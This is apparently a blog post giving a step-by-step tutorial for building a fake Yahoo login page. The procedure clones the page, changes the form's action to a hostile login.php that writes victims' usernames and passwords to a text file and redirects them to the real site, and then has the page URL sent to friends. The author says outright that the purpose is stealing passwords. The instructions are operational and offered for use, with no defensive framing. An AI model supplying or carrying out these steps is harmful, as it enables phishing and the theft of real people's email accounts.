How to Create a Fake Login Page?


In this post I’ll show you how to create a Fake Login Page in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.


Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.


 


Here is a step-by-step procedure to create a fake login page.


1. Go to the Yahoo login page by typing the following URL.


mail.yahoo.com


 2. Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)


3. Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .


4. Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files.You may also rename the .HTML file to yahoo.HTML


5. Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.


For example you may find something like this in the opened HTML file


src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif

Rename the above link into

 

src=”files/ma_mail_1.gif

Repeat the same procedure for every file contained in the Folder.

 

6. Now search for the following term

 

action=

 

you will see something like this

 

action=https://login.yahoo.com/config/login?


Edit this to

 

action=http://yoursite.com/login.php


Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

yoursite.com/


7. Now you have to upload your yahoo.HTML, files folder and login.php to

 


NOTE: Make sure that your host supports PHP


8. Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)


9. Once you do this distribute the Gmail.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file in your site.Download .TXT file to see the password inside


The details of hacking an email, using a Fake login page is discussed in detail in my new post  Hack Yahoo, Gmail or any other Password

Post a Comment

Previous Post Next Post